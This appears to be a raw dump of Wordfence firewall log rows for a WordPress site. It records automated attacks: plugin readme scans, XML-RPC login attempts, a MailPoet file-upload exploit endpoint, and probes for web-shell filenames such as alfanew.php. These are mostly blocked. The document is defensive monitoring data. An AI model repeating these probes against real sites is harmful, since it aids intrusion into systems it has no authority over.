(51660, 1712367964.600277, 1712367964.320900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/simple-file-list/readme.txt', NULL, 'Mozilla/5.0 (Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZmlsZS1saXN0L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZmlsZS1saXN0L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51648, 1712367596.341714, 1712367595.999400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/social-networking-e-commerce-1/social/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zb2NpYWwtbmV0d29ya2luZy1lLWNvbW1lcmNlLTEvc29jaWFsL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zb2NpYWwtbmV0d29ya2luZy1lLWNvbW1lcmNlLTEvc29jaWFsL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51659, 1712367964.600511, 1712367964.320900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/simple-file-list/readme.txt', NULL, 'Mozilla/5.0 (Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZmlsZS1saXN0L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZmlsZS1saXN0L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51649, 1712367595.112137, 1712367594.658000, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/social-networking-e-commerce-1/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zb2NpYWwtbmV0d29ya2luZy1lLWNvbW1lcmNlLTEvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zb2NpYWwtbmV0d29ya2luZy1lLWNvbW1lcmNlLTEvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51656, 1712367959.507175, 1712367959.161600, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-admin/admin-post.php?page=wysija_campaigns&action=themes', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.3', 'blocked:waf', 'MailPoet Newsletters <= 2.6.6 - Arbitrary File Upload', '{"learningMode":0,"failedRules":"65","paramKey":"c2VydmVyLmVtcHR5","paramValue":"bnVsbA==","path":"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw","category":"file_upload","ssl":1}'),
(51657, 1712367968.769689, 1712367968.369100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/supportcandy/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; MAR-LX1A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBwb3J0Y2FuZHkvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBwb3J0Y2FuZHkvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51658, 1712367968.769323, 1712367968.369100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/supportcandy/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; MAR-LX1A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBwb3J0Y2FuZHkvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBwb3J0Y2FuZHkvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51695, 1712368006.512939, 1712368006.104900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-yasslideshow/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC15YXNzbGlkZXNob3cvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC15YXNzbGlkZXNob3cvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51694, 1712368008.023373, 1712368007.575800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-homepage-slideshow/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/116.0.5746.194 Chrome/116.0.5746.194 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1ob21lcGFnZS1zbGlkZXNob3cvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1ob21lcGFnZS1zbGlkZXNob3cvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51688, 1712368011.611054, 1712368011.286400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-3dflick-slideshow/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/120.0.2210.160', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC0zZGZsaWNrLXNsaWRlc2hvdy9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC0zZGZsaWNrLXNsaWRlc2hvdy9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51679, 1712367998.214636, 1712367997.915000, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-catprogallery/readme.txt', NULL, 'Mozilla/5.0 (Android 14; Mobile; LG-M255; rv:122.0) Gecko/122.0 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1jYXRwcm9nYWxsZXJ5L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1jYXRwcm9nYWxsZXJ5L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51678, 1712367999.365668, 1712367999.079400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-levoslideshow/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-A528B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/23.0 Chrome/115.0.0.0 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1sZXZvc2xpZGVzaG93L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1sZXZvc2xpZGVzaG93L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51677, 1712367999.366009, 1712367999.079400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-levoslideshow/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-A528B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/23.0 Chrome/115.0.0.0 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1sZXZvc2xpZGVzaG93L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1sZXZvc2xpZGVzaG93L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51676, 1712368000.369615, 1712368000.061000, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/power-zoomer/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9wb3dlci16b29tZXIvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9wb3dlci16b29tZXIvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51590, 0.000000, 1712339686.114696, '\0\0\0\0\0\0\0\0\0\0ÿÿ.c', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51591, 0.000000, 1712339761.386110, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51592, 0.000000, 1712342322.542242, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51593, 0.000000, 1712342455.847906, '\0\0\0\0\0\0\0\0\0\0ÿÿ(Mÿ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51594, 0.000000, 1712343463.551477, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\5#Ó', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51595, 0.000000, 1712344928.924455, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51596, 0.000000, 1712345159.807156, '\0\0\0\0\0\0\0\0\0\0ÿÿUË''ë', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51597, 1712345163.521203, 1712345163.206100, '\0\0\0\0\0\0\0\0\0\0ÿÿUË''ë', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(51598, 1712345162.047064, 1712345161.571900, '\0\0\0\0\0\0\0\0\0\0ÿÿUË''ë', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(51599, 0.000000, 1712345875.995710, '\0\0\0\0\0\0\0\0\0\0ÿÿ¨ÄËY', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51600, 0.000000, 1712347468.903807, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51601, 1712349511.054566, 1712349510.552400, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œEv', 0, 403, 0, 0, 0, 'https://happythinking.com/', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Lw==","category":"brute-force","ssl":1}'),
(51603, 0.000000, 1712351214.877708, '\0\0\0\0\0\0\0\0\0\0ÿÿ±šU', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51604, 0.000000, 1712352329.500467, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51605, 0.000000, 1712354757.163390, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51606, 0.000000, 1712356760.722318, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾¼K­', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51602, 0.000000, 1712349930.815795, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51607, 0.000000, 1712357202.032758, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51608, 0.000000, 1712357570.424379, '\0\0\0\0\0\0\0\0\0\0ÿÿ=	gÔ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51609, 1712359396.432112, 1712359395.963200, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-login.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(51610, 1712359394.118635, 1712359393.682800, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/fw.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Z3LnBocA==","category":"brute-force","ssl":1}'),
(51632, 1712367530.875344, 1712367530.460400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/create-block-theme/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jcmVhdGUtYmxvY2stdGhlbWUvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jcmVhdGUtYmxvY2stdGhlbWUvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51611, 1712359391.943033, 1712359390.925000, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/alfanew.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFuZXcucGhw","category":"brute-force","ssl":1}'),
(51937, 1712637434.523771, 1712637434.188600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/alfanew.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFuZXcucGhw","category":"brute-force","ssl":1}'),
(51932, 1712637525.691355, 1712637525.339800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/configs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmZpZ3MucGhw","category":"brute-force","ssl":1}'),
(51931, 1712637537.271537, 1712637536.853400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/test.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3Rlc3QucGhw","category":"brute-force","ssl":1}'),
(50651, 1711731910.832853, 1711731910.442700, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com//alfanew.php7', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly9hbGZhbmV3LnBocDc=","category":"brute-force","ssl":1}'),
(50702, 1711810302.289898, 1711810302.014500, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/Cache/Cache.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9DYWNoZS9DYWNoZS5waHA=","category":"brute-force","ssl":1}'),
(50652, 1711731909.391905, 1711731908.994400, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///about.php7', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vYWJvdXQucGhwNw==","category":"brute-force","ssl":1}'),
(50648, 1711731914.979644, 1711731914.604100, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///ws.php7', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3MucGhwNw==","category":"brute-force","ssl":1}'),
